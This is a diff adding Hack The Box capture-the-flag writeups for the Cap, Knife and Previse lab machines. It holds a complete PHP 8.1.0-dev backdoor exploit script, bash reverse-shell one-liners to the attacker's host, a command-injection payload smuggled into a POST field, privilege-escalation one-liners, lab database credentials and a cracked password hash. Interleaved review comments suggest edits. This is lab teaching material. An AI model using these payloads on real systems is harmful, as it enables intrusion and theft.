+Now looking at the output of linpeas.sh we see that the cap_setuid capability has been enabled on the python3.8 binary. Which means that the user can run this binary as the root user. So we simply use python's [gtfobin](https://gtfobins.github.io/gtfobins/python/#capabilities):
+
+
+ nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
+ # id
+ uid=0(root) gid=1001(nathan) groups=1001(nathan)
+ # cat /root/root.txt
+ bfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to escalate our privileges to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
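Review bot: "Which means that the user can run this binary as the root user" misstates what cap_setuid grants: the capability lets the python3.8 process change its own UID, which is exactly why the one-liner calls os.setuid(0) before spawning /bin/sh; rewording it that way also makes clear that the fix is to remove the capability from the binary (setcap -r) rather than to restrict who may run python. The initial-access weakness is likewise never named: the gobuster output shows /0, /00, /01 and /1 under /data/ all answering 200, and the capture reached at /0 contains another user's password, so a sentence calling this out as missing authorization on the per-id capture pages would help (the text should also say which path actually serves the pcap, since gobuster was run against /data/ but the writeup then opens http://cap.htb/0/). Two lead-in sentences ("let's investigate it:" in Part 2 and "progress graph :" in the Conclusion) are followed by nothing, so the screenshots are missing; "<****!DOCTYPE", "<****title>", "<****h1>" and "<****p>" in the nmap output are markup residue; and "mentionned" should read "mentioned".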
diff --git a/Easy/63.md b/Easy/63.md
new file mode 100644
index 0000000..4999814
--- /dev/null
+++ b/Easy/63.md
@@ -0,0 +1,269 @@
+# Knife Writeup
+
+
+
+## Introduction :
+
+Knife is an easy Linux box released back in May 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/0 ] [~/HTB]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.14.57/23 ] [ /dev/pts/0 ] [~/HTB]
+ → cat /etc/hosts | tail -n1
+ 10.129.111.84 knife.htb
+
+ [ 10.10.14.57/23 ] [ /dev/pts/0 ] [~/HTB]
+ → nmap -sCV knife.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 21:44 CEST
+ Nmap scan report for knife.htb (10.129.111.84)
+ Host is up (0.039s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
+ | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
+ |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-title: Emergent Medical Idea
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.82 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Here we see that the website is running PHP 8.1.0 so let's look for available exploits:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~]
+ → searchsploit php 8.1.0
+ PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → cp /usr/share/exploit-database/exploits/php/webapps/49933.py .
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → vim 49933.py
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → cat 49933.py
+ # Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+ # Date: 23 may 2021
+ # Exploit Author: flast101
+ # Vendor Homepage: https://www.php.net/
+ # Software Link:
+ # - https://hub.docker.com/r/phpdaily/php
+ # - https://github.com/phpdaily/php
+ # Version: 8.1.0-dev
+ # Tested on: Ubuntu 20.04
+ # References:
+ # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+ # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+ """
+ Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+ Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+ Contact: flast101.sec@gmail.com
+
+ An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+ The following exploit uses the backdoor to provide a pseudo shell ont the host.
+ """
+
+ #!/usr/bin/env python3
+ import os
+ import re
+ import requests
+
+ host = input("Enter the full host url:\n")
+ request = requests.Session()
+ response = request.get(host)
+
+ if str(response) == '<****Response [200]>':
+ print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+ try:
+ while 1:
+ cmd = input("$ ")
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+ "User-Agentt": "zerodiumsystem('" + cmd + "');"
+ }
+ response = request.get(host, headers = headers, allow_redirects = False)
+ current_page = response.text
+ stdout = current_page.split(' <****!DOCTYPE html>',1)
+ text = print(stdout[0])
+ except KeyboardInterrupt:
+ print("Exiting...")
+ exit
+
+ else:
+ print("\r")
+ print(response)
+ print("Host is not available, aborting...")
+ exit
+
+Now let's try that exploit:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → python3 49933.py
+ Enter the full host url:
+ http://knife.htb
+
+ Interactive shell is opened on http://knife.htb
+ Can't acces tty; job crontol turned off.
+ $ id
+ uid=1000(james) gid=1000(james) groups=1000(james)
+
+
+
+And we got a shell as the james user! Now let's upgrade our shell to a fully interactive TTY:
+
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/15 ] [~/HTB/Knife]
+ → nc -lvnp 9001
+
+ [term2]
+ $ bash -c "bash -i >& /dev/tcp/10.10.14.68/9001 0>&1"
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/15 ] [~/HTB/Knife]
+ → nc -lvnp 9001
+ Connection from 10.129.111.84:45348
+ bash: cannot set terminal process group (893): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ james@knife:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+
+ james@knife:/$ ^Z
+ [1] + 269384 suspended nc -lvnp 9001
+
+ [ 10.10.14.68/23 ] [ /dev/pts/15 ] [~/HTB/Knife]
+ → stty raw -echo ; fg
+ [1] + 269384 continued nc -lvnp 9001
+
+ james@knife:/$ export TERM=screen-256color
+ james@knife:/$ export SHELL=bash
+ james@knife:/$ stty rows 40 columns 125
+ james@knife:/$ reset
+
+
+
+Now with this we have a fully interactive shell to work with. Let's grab the user flag:
+
+
+ james@knife:/$ cd ~
+ james@knife:~$ pwd
+ /home/james
+ james@knife:~$ cat user.txt
+ b6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Part 3 : Getting Root Access**
+
+Now in order to escalate privileges let's run linpeas.sh on the target machine:
+
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/14 ] [~/HTB/Knife]
+ → cp /home/nothing/HTB/Cap/linpeas.sh .
+
+ [ 10.10.14.68/23 ] [ /dev/pts/14 ] [~/HTB/Knife]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.111.84 - - [29/Apr/2022 21:15:53] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [term2]
+ james@knife:~$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-04-29 19:15:45-- http://10.10.14.68:9090/linpeas.sh
+ Connecting to 10.10.14.68:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ 2022-04-29 19:15:46 (1.05 MB/s) - ‘/tmp/peas.sh’ saved [776167/776167]
+
+ james@knife:~$ chmod +x /tmp/peas.sh
+ james@knife:~$ /tmp/peas.sh
+
+
+
+` 
+
+Looking at the output we see the following:
+
+
+
+Here we have the knife binary file which can be ran as root by the user james without any password, so let's see what it does:
+
+
+ james@knife:~$ /usr/bin/knife --help
+ Chef Infra Client: 16.10.8
+
+ Docs: https://docs.chef.io/workstation/knife/
+ Patents: https://www.chef.io/patents
+
+ Usage: knife sub-command (options)
+ -s, --server-url URL Chef Infra Server URL.
+ --chef-zero-host HOST Host to start Chef Infra Zero on.
+ --chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
+ -k, --key KEY Chef Infra Server API client key.
+ --[no-]color Use colored output, defaults to enabled.
+ -c, --config CONFIG The configuration file to use.
+ --config-option OPTION=VALUE Override a single configuration option.
+ --defaults Accept default values for all questions.
+ -d, --disable-editing Do not open EDITOR, just accept the data as is.
+ -e, --editor EDITOR Set the editor to use for interactive commands.
+ -E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
+ --[no-]fips Enable FIPS mode.
+ -F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
+ --[no-]listen Whether a local mode (-z) server binds to a port.
+ -z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
+ -u, --user USER Chef Infra Server API client username.
+ --print-after Show the data after a destructive operation.
+ --profile PROFILE The credentials profile to select.
+ -V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
+ -v, --version Show Chef Infra Client version.
+ -y, --yes Say yes to all prompts for confirmation.
+ -h, --help Show this help message.
+
+ Available subcommands: (for details, knife SUB-COMMAND --help)
+
+
+
+According to the documentation, this [knife](https://docs.chef.io/workstation/knife/) binary is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server. And it has a [gtfobin](https://gtfobins.github.io/gtfobins/knife/#sudo):
+
+
+ james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
+ a1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
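Review bot: the pasted PHP 8.1.0-dev exploit (from `#!/usr/bin/env python3` down to the final `exit`) has lost all of its indentation and carries markdown-escape residue in `'<****Response [200]>'` and `' <****!DOCTYPE html>'`, so the listing cannot be copied and run as shown; put it in a fenced code block with its original indentation and the literals `'<Response [200]>'` and `'<!DOCTYPE html>'`. While there, the two bare `exit` statements are no-op expressions in Python (use `sys.exit()`), and `text = print(stdout[0])` only assigns `None`. Further down, a stray `` ` `` line sits where the linpeas screenshot belongs, and "Looking at the output we see the following:" is followed by nothing, so the one finding the rest of the section depends on (that james can run `/usr/bin/knife` as root without a password) is never shown in the diff; paste the `sudo -l` output as text so the evidence survives without the image. Two wording points: "ont the host" should read "on the host", and since the exploit works purely by sending a `User-Agentt` request header, a one-line defender note that this header is a reliable indicator to alert on in web logs, and that the fix is replacing the backdoored dev build with a release build, would round off the section.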
diff --git a/Easy/64.md b/Easy/64.md
new file mode 100644
index 0000000..0265ea3
--- /dev/null
+++ b/Easy/64.md
@@ -0,0 +1,624 @@
+# Previse Writeup
+
+
+
+## Introduction :
+
+Previse is an easy Linux box released back in August 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → cat /etc/hosts | tail -n1
+ 10.129.111.192 previse.htb
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → nmap -sCV previse.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-29 21:49 CEST
+ Nmap scan report for previse.htb (10.129.111.192)
+ Host is up (0.037s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
+ | 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
+ |_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ | http-cookie-flags:
+ | /:
+ | PHPSESSID:
+ |_ httponly flag not set
+ | http-title: Previse Login
+ |_Requested resource was login.php
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → gobuster dir -t 50 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://previse.htb/ -x php,txt,html,css,js,pdf
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://previse.htb/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: txt,html,css,js,pdf,php
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/05/01 15:09:49 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /files.php (Status: 302) [Size: 4914] [--> login.php]
+ /header.php (Status: 200) [Size: 980]
+ /nav.php (Status: 200) [Size: 1248]
+ /login.php (Status: 200) [Size: 2224]
+ /download.php (Status: 302) [Size: 0] [--> login.php]
+ /footer.php (Status: 200) [Size: 217]
+ /index.php (Status: 302) [Size: 2801] [--> login.php]
+ /css (Status: 301) [Size: 308] [--> http://previse.htb/css/]
+ /status.php (Status: 302) [Size: 2966] [--> login.php]
+ /js (Status: 301) [Size: 307] [--> http://previse.htb/js/]
+ /logout.php (Status: 302) [Size: 0] [--> login.php]
+ /accounts.php (Status: 302) [Size: 3994] [--> login.php]
+ /config.php (Status: 200) [Size: 0]
+ /logs.php (Status: 302) [Size: 0] [--> login.php]
+
+
+
+Now let's visit **http://previse.htb/accounts.php** and intercept it with burpsuite:
+
+ 
+
+Now here we see something strange, the response we get is a 302 redirection, but the page it is supposed NOT to show gets displayed anyway:
+
+
+
+So instead let's just intercept the request, and and also intercept the response to this request:
+
+  
+
+Then once you click forward, you can create a user:
+
+
+
+Then just login:
+
+
+
+Then we can download the website files:
+
+
+
+Here we see that we can download a backup of the website, but also upload files:
+
+
+
+So first let's downlaod the website backup:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → mv ~/Downloads/siteBackup.zip .
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → mkdir www
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → mv siteBackup.zip www
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → cd www
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [HTB/Previse/www]
+ → unzip siteBackup.zip
+ Archive: siteBackup.zip
+ inflating: accounts.php
+ inflating: config.php
+ inflating: download.php
+ inflating: file_logs.php
+ inflating: files.php
+ inflating: footer.php
+ inflating: header.php
+ inflating: index.php
+ inflating: login.php
+ inflating: logout.php
+ inflating: logs.php
+ inflating: nav.php
+ inflating: status.php
+
+
+
+Now let's look at those files to see if there is any system-side command that can be ran::
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [HTB/Previse/www]
+ → grep -oP 'exec.*' *
+ logs.php:exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
+
+
+
+And here we see that the logs.php file has a line which runs a python script (log_process.py) that takes the **delim** parameter value as arguement. So let's intercept the POST request to that page:
+
+ 
+
+Here we see that the webpage took approximately 0.5 second to load. Now let's try to see if we have command execution by running the sleep command:
+
+
+
+And here we see that we managed to execute a system command, because we manmaged to make it wait one additional second more. So let's try to get a reverse bash shell:
+
+
+ delim=comma ; bash -c 'bash -i >& /dev/tcp/10.10.14.68/9001 0>&1'
+
+
+
+CTRL+U to url encode it:
+
+
+ delim=comma ; bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.68/9001+0>%261'
+
+
+
+Then send it:
+
+
+
+And we have a reverse shell as www-data! Now let's upgrade our reverse shell to a fully interactive TTY:
+
+
+ [ 10.10.14.68/23 ] [ /dev/pts/22 ] [~]
+ → nc -lvnp 9001
+ Connection from 10.129.95.185:59414
+ bash: cannot set terminal process group (1568): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@previse:/var/www/html$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@previse:/var/www/html$ which python python3 curl wget
+ which python python3 curl wget
+ /usr/bin/python
+ /usr/bin/python3
+ /usr/bin/curl
+ /usr/bin/wget
+ www-data@previse:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@previse:/var/www/html$ ^Z
+ [1] + 1698749 suspended nc -lvnp 9001
+
+ [ 10.10.14.68/23 ] [ /dev/pts/22 ] [~]
+ → stty raw -echo ; fg
+ [1] + 1698749 continued nc -lvnp 9001
+ export TERM=screen-256color
+ www-data@previse:/var/www/html$ export SHELL=bash
+ www-data@previse:/var/www/html$ stty rows 50 cols 200
+ www-data@previse:/var/www/html$ reset
+
+
+
+Now that we have a fully interactive TTY let's enumerate the host using linpeas.sh:
+
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → cp ../Cap/linpeas.sh .
+
+ [ 10.10.14.68/23 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.95.185 - - [02/May/2022 13:03:29] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [term2]
+ www-data@previse:/var/www/html$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-05-02 11:03:22-- http://10.10.14.68:9090/linpeas.sh
+ Connecting to 10.10.14.68:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: '/tmp/peas.sh'
+
+ /tmp/peas.sh 100%[=============================================================================================================>] 757.98K 1.41MB/s in 0.5s
+
+ 2022-05-02 11:03:23 (1.41 MB/s) - '/tmp/peas.sh' saved [776167/776167]
+
+ www-data@previse:/var/www/html$ chmod +x /tmp/peas.sh
+ www-data@previse:/var/www/html$ /tmp/peas.sh
+
+
+
+` 
+
+Looking at linpeas.sh's output we see that there is a mysql database on the server:
+
+
+
+And when we look at the config.php file we see the mysql password:
+
+
+ www-data@previse:/var/www/html$ ls -lash
+ total 188K
+ 4.0K drwxr-xr-x 4 www-data www-data 4.0K Jul 26 2021 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 26 2021 ..
+ 8.0K -rw-r--r-- 1 www-data www-data 5.6K Jun 12 2021 accounts.php
+ 16K -rwxrwxr-x 1 www-data www-data 16K Jun 3 2021 android-chrome-192x192.png
+ 52K -rwxrwxr-x 1 www-data www-data 50K Jun 3 2021 android-chrome-512x512.png
+ 16K -rwxrwxr-x 1 www-data www-data 14K Jun 3 2021 apple-touch-icon.png
+ 4.0K -rw-r--r-- 1 www-data www-data 208 Jun 12 2021 config.php
+ 4.0K drwxr-xr-x 2 www-data www-data 4.0K Jul 26 2021 css
+ 4.0K -rw-r--r-- 1 www-data www-data 1.6K Jun 9 2021 download.php
+ 4.0K -rwxrwxr-x 1 www-data www-data 724 Jun 3 2021 favicon-16x16.png
+ 4.0K -rwxrwxr-x 1 www-data www-data 1.7K Jun 3 2021 favicon-32x32.png
+ 16K -rwxrwxr-x 1 www-data www-data 16K Jun 3 2021 favicon.ico
+ 4.0K -rw-r--r-- 1 www-data www-data 1.2K Jun 12 2021 file_logs.php
+ 8.0K -rw-r--r-- 1 www-data www-data 6.0K Jun 9 2021 files.php
+ 4.0K -rw-r--r-- 1 www-data www-data 217 Jun 3 2021 footer.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1012 Jun 6 2021 header.php
+ 4.0K -rw-r--r-- 1 www-data www-data 551 Jun 6 2021 index.php
+ 4.0K drwxr-xr-x 2 www-data www-data 4.0K Jul 26 2021 js
+ 4.0K -rw-r--r-- 1 www-data www-data 2.9K Jun 12 2021 login.php
+ 4.0K -rw-r--r-- 1 www-data www-data 190 Jun 8 2021 logout.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.2K Jun 9 2021 logs.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.3K Jun 5 2021 nav.php
+ 4.0K -rwxrwxr-x 1 www-data www-data 263 Jun 3 2021 site.webmanifest
+ 4.0K -rw-r--r-- 1 www-data www-data 1.9K Jun 9 2021 status.php
+ www-data@previse:/var/www/html$ cat config.php
+ <****?php
+
+ function connectDB(){
+ $host = 'localhost';
+ $user = 'root';
+ $passwd = 'mySQL_p@ssw0rd!:)';
+ $db = 'previse';
+ $mycon = new mysqli($host, $user, $passwd, $db);
+ return $mycon;
+ }
+
+ ?****>
+
+And we have the mysql credentials! **root:mySQL_p@ssw0rd!:)**
+
+
+ www-data@previse:/var/www/html$ mysql -u root -p
+ Enter password:
+ Welcome to the MySQL monitor. Commands end with ; or \g.
+ Your MySQL connection id is 19
+ Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
+
+ Copyright (c) 2000, 2021, Oracle and/or its affiliates.
+
+ Oracle is a registered trademark of Oracle Corporation and/or its
+ affiliates. Other names may be trademarks of their respective
+ owners.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ mysql> show databases;
+ +--------------------+
+ | Database |
+ +--------------------+
+ | information_schema |
+ | mysql |
+ | performance_schema |
+ | previse |
+ | sys |
+ +--------------------+
+ 5 rows in set (0.01 sec)
+
+
+
+Let's take a look at the previse database:
+
+
+ mysql> use previse;
+ Reading table information for completion of table and column names
+ You can turn off this feature to get a quicker startup with -A
+
+ Database changed
+ mysql> show tables;
+ +-------------------+
+ | Tables_in_previse |
+ +-------------------+
+ | accounts |
+ | files |
+ +-------------------+
+ 2 rows in set (0.00 sec)
+
+ mysql> describe accounts;
+ +------------+--------------+------+-----+-------------------+----------------+
+ | Field | Type | Null | Key | Default | Extra |
+ +------------+--------------+------+-----+-------------------+----------------+
+ | id | int(11) | NO | PRI | NULL | auto_increment |
+ | username | varchar(50) | NO | UNI | NULL | |
+ | password | varchar(255) | NO | | NULL | |
+ | created_at | datetime | YES | | CURRENT_TIMESTAMP | |
+ +------------+--------------+------+-----+-------------------+----------------+
+ 4 rows in set (0.00 sec)
+
+ mysql> select * from accounts;
+ +----+----------+------------------------------------+---------------------+
+ | id | username | password | created_at |
+ +----+----------+------------------------------------+---------------------+
+ | 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
+ | 2 | nihilist | $1$🧂llol$2LVHOe2s.o1uq/rzC1K1A0 | 2022-05-02 10:27:41 |
+ +----+----------+------------------------------------+---------------------+
+
+
+
+Now here we see that the password field has a weird character in the middle, so to make sure we transfer it correctly to our machine let's use base64:
+
+
+ [term1]
+ mysql> select TO_BASE64(password) from accounts where id=1;
+ +--------------------------------------------------+
+ | TO_BASE64(password) |
+ +--------------------------------------------------+
+ | JDEk8J+ngmxsb2wkRFFwbWR2bmI3RWV1TzZVYXFSSXRmLg== |
+ +--------------------------------------------------+
+ 1 row in set (0.00 sec)
+
+ [term2]
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → vim pass.b64
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → cat pass.b64
+ JDEk8J+ngmxsb2wkRFFwbWR2bmI3RWV1TzZVYXFSSXRmLg==
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → cat pass.b64 | base64 -d > pass.hash
+
+
+Now let's use hashcat to crack the hash using the rockyou.txt wordlist:
+
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → hashcat -m 500 -a 0 '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' /usr/share/seclists/rockyou.txt
+ hashcat (v6.2.5) starting
+
+ * Device #1: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ * Device #2: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ CUDA API (CUDA 11.6)
+ ====================
+ * Device #1: NVIDIA GeForce RTX 3070 Ti, 4258/7979 MB, 48MCU
+
+ OpenCL API (OpenCL 3.0 CUDA 11.6.127) - Platform #1 [NVIDIA Corporation]
+ ========================================================================
+ * Device #2: NVIDIA GeForce RTX 3070 Ti, skipped
+
+ Minimum password length supported by kernel: 0
+ Maximum password length supported by kernel: 256
+
+ Hashes: 1 digests; 1 unique digests, 1 unique salts
+ Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
+ Rules: 1
+
+ Optimizers applied:
+ * Zero-Byte
+ * Single-Hash
+ * Single-Salt
+
+ ATTENTION! Pure (unoptimized) backend kernels selected.
+ Pure kernels can crack longer passwords, but drastically reduce performance.
+ If you want to switch to optimized kernels, append -O to your commandline.
+ See the above message to find out about the exact limits.
+
+ Watchdog: Temperature abort trigger set to 90c
+
+ Host memory required for this attack: 1356 MB
+
+ Dictionary cache hit:
+ * Filename..: /usr/share/seclists/rockyou.txt
+ * Passwords.: 14344384
+ * Bytes.....: 139921497
+ * Keyspace..: 14344384
+
+ Cracking performance lower than expected?
+
+ * Append -O to the commandline.
+ This lowers the maximum supported password/salt length (usually down to 32).
+
+ * Append -w 3 to the commandline.
+ This can cause your screen to lag.
+
+ * Append -S to the commandline.
+ This has a drastic speed impact but can be better for specific attacks.
+ Typical scenarios are a small wordlist but a large ruleset.
+
+ * Update your backend API runtime / driver the right way:
+ https://hashcat.net/faq/wrongdriver
+
+ * Create more work items to make use of your parallelization power:
+ https://hashcat.net/faq/morework
+
+ **$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!**
+
+ Session..........: hashcat
+ Status...........: Cracked
+ Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
+ Hash.Target......: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
+ Time.Started.....: Mon May 2 13:22:23 2022 (10 secs)
+ Time.Estimated...: Mon May 2 13:22:33 2022 (0 secs)
+ Kernel.Feature...: Pure Kernel
+ Guess.Base.......: File (/usr/share/seclists/rockyou.txt)
+ Guess.Queue......: 1/1 (100.00%)
+ Speed.#1.........: 780.8 kH/s (11.24ms) @ Accel:16 Loops:125 Thr:256 Vec:1
+ Recovered........: 1/1 (100.00%) Digests
+ Progress.........: 7471104/14344384 (52.08%)
+ Rejected.........: 0/7471104 (0.00%)
+ Restore.Point....: 7274496/14344384 (50.71%)
+ Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
+ Candidate.Engine.: Device Generator
+ Candidates.#1....: ivanisaac -> iarmy
+ Hardware.Mon.#1..: Temp: 53c Fan: 64% Util: 75% Core:1950MHz Mem:9501MHz Bus:16
+
+ Started: Mon May 2 13:22:23 2022
+ Stopped: Mon May 2 13:22:34 2022
+
+
+
+And we cracked the hash! now let's try to ssh in as the user m4lwhere using that password:
+
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → ssh m4lwhere@previse.htb
+ The authenticity of host 'previse.htb (10.129.95.185)' can't be established.
+ ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts.
+ m4lwhere@previse.htb's password:
+ Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
